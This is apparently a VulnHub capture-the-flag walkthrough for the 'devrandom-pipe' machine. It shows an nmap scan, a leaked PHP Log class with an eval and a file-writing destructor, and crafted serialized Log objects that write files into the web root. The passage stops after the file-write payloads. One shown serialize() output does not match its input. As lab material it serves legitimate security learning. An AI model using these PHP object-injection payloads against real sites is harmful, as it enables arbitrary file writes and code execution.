Skip to content

devrandom-pipe

PHP Deserialization VulnHub - Free

https://www.vulnhub.com/entry/devrandom-pipe,124/

Port Scan

$ sudo nmap 192.168.255.0/24 -p- -T4 --min-rate=10000 -sCV

Nmap scan report for 192.168.255.143
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|   256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
|_  256 7b:00:f7:dc:31:24:18:cf:e4:0a:ec:7a:32:d9:f6:a2 (ED25519)
80/tcp    open  http    Apache httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=index.php
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32913/udp   status
|   100024  1          34859/tcp   status
|   100024  1          41533/tcp6  status
|_  100024  1          51307/udp6  status
34859/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:DC:FF:3D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web APP

Visit port 80, but need credential

alt text

Use GETS method

alt text

alt text

scriptz/php.js contains a serialize() function

alt text

log.php.BAK

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
    $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
    $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
    file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>

<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); 
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script>

serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); 

a:4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

serialize({filename:'/var/www/html/scriptz/hi.txt', data:'TheTreacheryofImages'})

'a:2:{s:8:"filename";s:28:"/var/www/html/scriptz/my.txt";s:4:"data";s:13:"what the hell";}'

O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/hi.txt";s:4:"data";s:20:"TheTreacheryofImages";}

O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/Meh1.txt";s:4:"data";s:12:"HighOnCoffee";}

alt text